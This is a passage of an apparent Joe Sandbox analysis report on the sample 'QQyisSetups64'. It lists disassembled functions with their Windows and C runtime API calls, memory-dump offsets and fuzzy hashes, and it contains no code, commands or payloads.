Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: ErrorLast$CriticalHeapSection$AllocEnterFreeLeave
String ID:
API String ID: 2060118545-0
Opcode ID: b06661632ed82e5706121715d877c20ac714f94266d0a23a2cb5cd4ea6752893
Instruction ID: 1b99ebbe83f3eea1a6c3e5a3bb6676143aa99500fa2b6f78dafd837ca4b487e2
Opcode Fuzzy Hash: b06661632ed82e5706121715d877c20ac714f94266d0a23a2cb5cd4ea6752893
Instruction Fuzzy Hash: BB11A73AA45518A78B10FF6AF8445DEB7A8EB88322B4945A6EC0DD7A00D6359D0146D0

Function 02C84380 Relevance: 6.1, APIs: 4, Instructions: 70networkCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000139F), ref: 02C843EC

Part of subcall function 02C813A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 02C813CB

Part of subcall function 02C84C50: HeapFree.KERNEL32(?,00000000,?,00000000,02C84E35,?,02C842C8,02C84E35,00000000,?,?,02C84E35,?), ref: 02C84C77

SetLastError.KERNEL32(00000000,?), ref: 02C843D7
SetLastError.KERNEL32(00000057), ref: 02C84401
WSAGetLastError.WS2_32(?), ref: 02C84410

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: ErrorLast$Heap$AllocFree
String ID:
API String ID: 1906775185-0
Opcode ID: 2b77472b835e58551904f0fc8ed1e280bdcf17db5dab450bc167e2fe869645f9
Instruction ID: c5b0608ada8dc7099c9bf013af7c3189ccda051a7d4777d9c33ef4da7d0d121e
Opcode Fuzzy Hash: 2b77472b835e58551904f0fc8ed1e280bdcf17db5dab450bc167e2fe869645f9
Instruction Fuzzy Hash: 3211CA36E055189B8720FF69F8446EEB7A8EFC4376B4445A6ED0CD7200D735991146D0

Function 0378DE70 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0378DE93
_free.LIBCMT ref: 0378DED5
GetProcessHeap.KERNEL32(00000000,00000000,0378DC95), ref: 0378DEFC
HeapFree.KERNEL32(00000000), ref: 0378DF03

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Heap_free$FreeProcess
String ID:
API String ID: 1072109031-0
Opcode ID: 7b9b6b6d48e6e1b4b88665f9a8b1b1c6496c48bdee09efaea90f9fd5f5bfaaec
Instruction ID: fad41408b7f5f153a80e34492448ac69b44765c5687ac7e4660aa928007431c1
Opcode Fuzzy Hash: 7b9b6b6d48e6e1b4b88665f9a8b1b1c6496c48bdee09efaea90f9fd5f5bfaaec
Instruction Fuzzy Hash: 7711FB75640B009BD730EB65CD49F67B3AABF84710F18891CE59A87A90DB74F842CB91

Function 03783BF0 Relevance: 6.1, APIs: 4, Instructions: 58networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,03783ABB,00000023), ref: 03783C02
WSAGetLastError.WS2_32 ref: 03783C0D
send.WS2_32(?,00000000,00000000,00000000), ref: 03783C58
WSAGetLastError.WS2_32 ref: 03783C63

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: ErrorLast$EventSelectsend
String ID:
API String ID: 259408233-0
Opcode ID: 8cd3f0d9044cd6883f523ba285a0cb2b39d81abba004dc94c88477b3f1d148d5
Instruction ID: 4b950e8752de16b2a6b2583d3798b80cdf45c6f1272777ca6d1d8a3baededc9f
Opcode Fuzzy Hash: 8cd3f0d9044cd6883f523ba285a0cb2b39d81abba004dc94c88477b3f1d148d5
Instruction Fuzzy Hash: 461170BA600B009BE720EF7DD888A57B6F9FBC9B10F114A2DF556C7A81D775E4008B50

Function 02C83BF0 Relevance: 6.1, APIs: 4, Instructions: 58networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,02C83ABB,00000023), ref: 02C83C02
WSAGetLastError.WS2_32 ref: 02C83C0D
send.WS2_32(?,00000000,00000000,00000000), ref: 02C83C58
WSAGetLastError.WS2_32 ref: 02C83C63

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: ErrorLast$EventSelectsend
String ID:
API String ID: 259408233-0
Opcode ID: 790858b6ab8531cfb1a2640e49c60aee20dac41b0b06f232719c1df8c5acb3fc
Instruction ID: 32157a1b091fe9811aaf2c6ca4ee21969b0cbe39e35106583fb1e6f470b5973b
Opcode Fuzzy Hash: 790858b6ab8531cfb1a2640e49c60aee20dac41b0b06f232719c1df8c5acb3fc
Instruction Fuzzy Hash: 4D114CB6600B409BD320AB79D888A57B6E9FBC8B18F414A2DEA57C3690D771E5409B50

Function 0288F338 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0288F35E

Part of subcall function 0288F18A: __fltout2.LIBCMT ref: 0288F1B5

__cftog_l.LIBCMT ref: 0288F384
__cftoe_l.LIBCMT ref: 0288F3B6

Memory Dump Source

Source File: 00000006.00000002.2574280796.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2880000_QQyisSetups64.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 6d595d1d5f919cb74844ab2beb272ef5c06662e265a015b22e6ae2a300a47d27
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: DD112E3A04414EBBCF166E88CC158ED3F23BF28254F988915FE1899430D73AD571EB81

Function 0379BDEB Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0379BE11

Part of subcall function 0379BC3D: __fltout2.LIBCMT ref: 0379BC68

__cftog_l.LIBCMT ref: 0379BE37
__cftoe_l.LIBCMT ref: 0379BE69

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 66c78ba46513717e56f922f808f386da4b06c1c14e8a6e3630a8b752fd876efb
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: B9118C3600014EBFDF169E84EC56CEE3F6BBB18250F488656FA1858130C736C5B1AB81

Function 02C8F361 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 02C8F387

Part of subcall function 02C8F1B3: __fltout2.LIBCMT ref: 02C8F1DE

__cftog_l.LIBCMT ref: 02C8F3AD
__cftoe_l.LIBCMT ref: 02C8F3DF

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 431296fc96daaff45656c437579f7b6ad015197716d3bde7bcaa2d32701bb897
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: D3114E3604014AFBCF126E84CC518EE3F23BB49358F898419FA1859930D336C6B1AB81

Function 0361B7AA Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0361B7D0

Part of subcall function 0361B5FC: __fltout2.LIBCMT ref: 0361B627

__cftog_l.LIBCMT ref: 0361B7F6
__cftoe_l.LIBCMT ref: 0361B828

Memory Dump Source

Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 85b95536d3a1714bd745ae8a136c62b82970a670ba49ae16bf80b49b22c8d7f0
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 9B11897600014EBBCF129F94CD55CEE3F22BB18254F0C8418FE285A230C336C5B2AB81

Function 0288D995 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0288D9A1

Part of subcall function 028898E6: __getptd_noexit.LIBCMT ref: 028898E9
Part of subcall function 028898E6: __amsg_exit.LIBCMT ref: 028898F6

__amsg_exit.LIBCMT ref: 0288D9C1
__lock.LIBCMT ref: 0288D9D1
_free.LIBCMT ref: 0288DA01

Memory Dump Source

Source File: 00000006.00000002.2574280796.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2880000_QQyisSetups64.jbxd

Similarity

API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3170801528-0
Opcode ID: dcfced8234ba75e6e02d5464e1e82598378604a0c6e90570ba5556207cf73916
Instruction ID: bc04d010f42f00f7dc2139ac1e108abeffafcef9eea73ae6296603908f2359b8
Opcode Fuzzy Hash: dcfced8234ba75e6e02d5464e1e82598378604a0c6e90570ba5556207cf73916
Instruction Fuzzy Hash: C6016D3E905621DBDB21BF78C884769B7A2BF04715F154005E804EB2D0DB34A951CFD7

Function 03614244 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 03614250

Part of subcall function 0361381A: __getptd_noexit.LIBCMT ref: 0361381D
Part of subcall function 0361381A: __amsg_exit.LIBCMT ref: 0361382A

__amsg_exit.LIBCMT ref: 03614270
__lock.LIBCMT ref: 03614280
_free.LIBCMT ref: 036142B0

Memory Dump Source

Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd

Similarity

API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3170801528-0
Opcode ID: 5ef467ea6fd3a6922cde44d000b760b61804c61db5949c02be97e0f772367ebf
Instruction ID: 8aa204ac4491830b3715adb5b675b60a805e54655f1b883ea97da4cfe305867c
Opcode Fuzzy Hash: 5ef467ea6fd3a6922cde44d000b760b61804c61db5949c02be97e0f772367ebf
Instruction Fuzzy Hash: D8015E35D01761ABDB22EF668844759F7B0AF057A0F5D4109E8146B390CB3459A2CBDD

Function 037841E0 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(03784FB5,03784E55,037842BE,00000000,?,?,03784E55,?,?,?,?,00000000,000000FF), ref: 037841E8
LeaveCriticalSection.KERNEL32(03784FB5,?,?,?,00000000,000000FF), ref: 037841F6
LeaveCriticalSection.KERNEL32(03784FB5), ref: 03784257
SetEvent.KERNEL32(8520468B), ref: 03784272

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: CriticalSection$Leave$EnterEvent
String ID:
API String ID: 3394196147-0
Opcode ID: 4523d13377f7656bf6466c8943904b1f11cfa07a3511922c0ab302a4bd64d844
Instruction ID: 857fffc76d8b7312da4b5e1d8ac235efe1756274290c05c096bb4846486417d1
Opcode Fuzzy Hash: 4523d13377f7656bf6466c8943904b1f11cfa07a3511922c0ab302a4bd64d844
Instruction Fuzzy Hash: 3B1115B0605B059FD728DF75D588AD6B7E9BF88300B15C96DE45E87211EB35E801CB00

Function 03784B00 Relevance: 6.0, APIs: 4, Instructions: 45timeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM(00000001,?,00000001,?,03783C4F,?,?,00000001), ref: 03784B15
InterlockedIncrement.KERNEL32(00000001), ref: 03784B24
InterlockedIncrement.KERNEL32(00000001), ref: 03784B31
timeGetTime.WINMM(?,03783C4F,?,?,00000001), ref: 03784B48

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: IncrementInterlockedTimetime
String ID:
API String ID: 159728177-0
Opcode ID: 95cbc43be65496a3bcc6191f5dee66f5529fb8f7d0e55ef136e5127bc3e425b0
Instruction ID: 37966fa4543f68567603205516ef7d2017ce0a4a92dd7e2d1b13136498f157c4
Opcode Fuzzy Hash: 95cbc43be65496a3bcc6191f5dee66f5529fb8f7d0e55ef136e5127bc3e425b0
Instruction Fuzzy Hash: C401C8B56007059FC720EF6AD88094AFBECAF98650700892AE549C7611E674E5448FA0

Function 02C84AE0 Relevance: 6.0, APIs: 4, Instructions: 45timeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM(00000001,?,00000001,?,02C83C4F,?,?,00000001), ref: 02C84AF5
InterlockedIncrement.KERNEL32(00000001), ref: 02C84B04
InterlockedIncrement.KERNEL32(00000001), ref: 02C84B11
timeGetTime.WINMM(?,02C83C4F,?,?,00000001), ref: 02C84B28

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: IncrementInterlockedTimetime
String ID:
API String ID: 159728177-0
Opcode ID: 2dbf0173a2e878a9a4a76d8981d7811482ee4b2649050b1662b78346d103fede
Instruction ID: 29a822c817e464a0c57c4a6a7c354ce476dc1e5e47cd148900efed0cc8d84c8f
Opcode Fuzzy Hash: 2dbf0173a2e878a9a4a76d8981d7811482ee4b2649050b1662b78346d103fede
Instruction Fuzzy Hash: CA01DAB5A007059FC721EF7AD880A5AFBF9AF58754740892EE549C7600E774E6448FE0

Function 03783660 Relevance: 6.0, APIs: 4, Instructions: 42timeCOMMON

Download Yara Rule

APIs

CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 03783667
_free.LIBCMT ref: 0378369C

Part of subcall function 0378F639: RtlFreeHeap.NTDLL(00000000,00000000,?,03793E4C,00000000,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76), ref: 0378F64F
Part of subcall function 0378F639: GetLastError.KERNEL32(00000000,?,03793E4C,00000000,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76,00000000), ref: 0378F661

_malloc.LIBCMT ref: 037836D7
_memset.LIBCMT ref: 037836E5

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
String ID:
API String ID: 3340475617-0
Opcode ID: db3a4e1adaa563edad9699f04dbbd8798812986cf8836ce7d692194509d33a69
Instruction ID: 76c1814f3ede0ae6878e71fe4cace249e666bbf7063836745b27ff89d124fbb3
Opcode Fuzzy Hash: db3a4e1adaa563edad9699f04dbbd8798812986cf8836ce7d692194509d33a69
Instruction Fuzzy Hash: 6F01DAF5940B04DFE360EF7AD885B97BBE9EB85254F148C2ED5AE87301D635A8058F20

Function 02C83660 Relevance: 6.0, APIs: 4, Instructions: 42timeCOMMON

Download Yara Rule

APIs

CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 02C83667
_free.LIBCMT ref: 02C8369C

Part of subcall function 02C86E49: HeapFree.KERNEL32(00000000,00000000,?,02C89900,00000000,?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C,02C8C15F), ref: 02C86E5F
Part of subcall function 02C86E49: GetLastError.KERNEL32(00000000,?,02C89900,00000000,?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C,02C8C15F,00000000), ref: 02C86E71

_malloc.LIBCMT ref: 02C836D7
_memset.LIBCMT ref: 02C836E5

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
String ID:
API String ID: 3340475617-0
Opcode ID: 21fb21d618a5aa4071b63d544a29c636425bb92ded2beb255252dcf52687bd30
Instruction ID: 292483d33c0c741c81d1cf62c7e4b049e9477629fa9a27ffbd426ab6ac982d25
Opcode Fuzzy Hash: 21fb21d618a5aa4071b63d544a29c636425bb92ded2beb255252dcf52687bd30
Instruction Fuzzy Hash: 6A01C8F1900B449FE3209F7AD881B97BAE9FB85358F10882ED5AE83301D630A9048F60

Function 02886EEE Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 02886F08

Part of subcall function 02886E5A: __FF_MSGBANNER.LIBCMT ref: 02886E73
Part of subcall function 02886E5A: __NMSG_WRITE.LIBCMT ref: 02886E7A

std::exception::exception.LIBCMT ref: 02886F3D
std::exception::exception.LIBCMT ref: 02886F57
__CxxThrowException@8.LIBCMT ref: 02886F68

Memory Dump Source

Source File: 00000006.00000002.2574280796.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2880000_QQyisSetups64.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw_malloc
String ID:
API String ID: 2388904642-0
Opcode ID: 1e9301e5085f9c58ec7a0ab4f7fc891bb570a668ba91a7db57855d99bd873ef8
Instruction ID: fc04166981fb44731eadcc56615230745e672efc00e8bdbd07cdc6c9219650f8
Opcode Fuzzy Hash: 1e9301e5085f9c58ec7a0ab4f7fc891bb570a668ba91a7db57855d99bd873ef8
Instruction Fuzzy Hash: 56F0A43E4042A9A6DB05FB68CC84AAD7AFFEB41714F640059D428DA0D1FBB1DAC1CB56

Function 0360F0C6 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0360F0E0

Part of subcall function 0360F032: __FF_MSGBANNER.LIBCMT ref: 0360F04B
Part of subcall function 0360F032: __NMSG_WRITE.LIBCMT ref: 0360F052

std::exception::exception.LIBCMT ref: 0360F115
std::exception::exception.LIBCMT ref: 0360F12F
__CxxThrowException@8.LIBCMT ref: 0360F140

Memory Dump Source

Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw_malloc
String ID:
API String ID: 2388904642-0
Opcode ID: b08fdf8cb5e3b65abb6e8e2bd981c9ae2de8ac343fbf2f6e0fd6789c4a68690e
Instruction ID: 8c80e33812df64305e664b70f98dc572c3d87fca7abe3c8984cc33453e245385
Opcode Fuzzy Hash: b08fdf8cb5e3b65abb6e8e2bd981c9ae2de8ac343fbf2f6e0fd6789c4a68690e
Instruction Fuzzy Hash: 78F02D358003146BDB29EB54DD259BF7B6DDB40644F94446CD4019E1D0DB718A02CB41

Function 0378CD80 Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 03781420: HeapFree.KERNEL32(?,00000000,?,?,?,037840B1,?,00000000,03784039,?,771ADFA0,03783648), ref: 0378143D
Part of subcall function 03781420: _free.LIBCMT ref: 03781459

HeapDestroy.KERNEL32(00000000), ref: 0378CD93
HeapCreate.KERNEL32(?,?,?), ref: 0378CDA5
_free.LIBCMT ref: 0378CDB5
HeapDestroy.KERNEL32 ref: 0378CDE2

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Heap$Destroy_free$CreateFree
String ID:
API String ID: 4097506873-0
Opcode ID: 1e1abc803247464b6f3bb0420f0a0d998ec74a3a95256ff2480d6bce5cfcf313
Instruction ID: 4c8494fb464b486f35ecd322f859c6fb392ec72cb91fca1fc6e6c374795b0b79
Opcode Fuzzy Hash: 1e1abc803247464b6f3bb0420f0a0d998ec74a3a95256ff2480d6bce5cfcf313
Instruction Fuzzy Hash: 9BF037B9200B02ABD310EF24E808B53FBB8FF84714F158918E85997684DB34E851CBA0

Function 02C86490 Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02C81420: HeapFree.KERNEL32(?,00000000,?,?,?,02C840B1,?,00000000,02C84039,?,771ADFA0,02C83648), ref: 02C8143D
Part of subcall function 02C81420: _free.LIBCMT ref: 02C81459

HeapDestroy.KERNEL32(00000000), ref: 02C864A3
HeapCreate.KERNEL32(?,?,?), ref: 02C864B5
_free.LIBCMT ref: 02C864C5
HeapDestroy.KERNEL32 ref: 02C864F2

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: Heap$Destroy_free$CreateFree
String ID:
API String ID: 4097506873-0
Opcode ID: 0a9d888a0594945ee7e19fded0b1e5f48cdf477137a27741001871651be64c73
Instruction ID: 4ede459c6da88a020462d018707807b741fd149e4be6f4d4e2831d4890d279c9
Opcode Fuzzy Hash: 0a9d888a0594945ee7e19fded0b1e5f48cdf477137a27741001871651be64c73
Instruction Fuzzy Hash: A7F037B5500702ABE720EF25E808B17B7F9FF84758F24891CE85997240DB34E865CBE0

Function 0288718D Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 02887193
___fls_getvalue@4.LIBCMT ref: 0288719E
___fls_setvalue@8.LIBCMT ref: 028871B1
__freefls@4.LIBCMT ref: 028871E7

Memory Dump Source

Source File: 00000006.00000002.2574280796.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2880000_QQyisSetups64.jbxd

Similarity

API ID: ___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
String ID:
API String ID: 865245655-0
Opcode ID: 9534965ccca21370a2365faca07fc43a5bbbcb8b41f594eb418147c089430495
Instruction ID: 58034561d21913577e5b6159048283e7fc4610aa266dc08a348e090aba91de69
Opcode Fuzzy Hash: 9534965ccca21370a2365faca07fc43a5bbbcb8b41f594eb418147c089430495
Instruction Fuzzy Hash: D5F0907C400204EBC704BFB4CC48D2EBBAAAF89345325C858E909CB315EB35D402CFA2

Function 0360F383 Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 0360F389
___fls_getvalue@4.LIBCMT ref: 0360F394
___fls_setvalue@8.LIBCMT ref: 0360F3A7
__freefls@4.LIBCMT ref: 0360F3DD

Memory Dump Source

Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd

Similarity

API ID: ___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
String ID:
API String ID: 865245655-0
Opcode ID: 966baa02cbab0462d49951f9c363315c70f1ec3e6bd818d3c9011fc18f246283
Instruction ID: 092f9db0ecb814dafe5c6d826325e783bfe5c319738a3e19fe0ad3c0906d1fc5
Opcode Fuzzy Hash: 966baa02cbab0462d49951f9c363315c70f1ec3e6bd818d3c9011fc18f246283
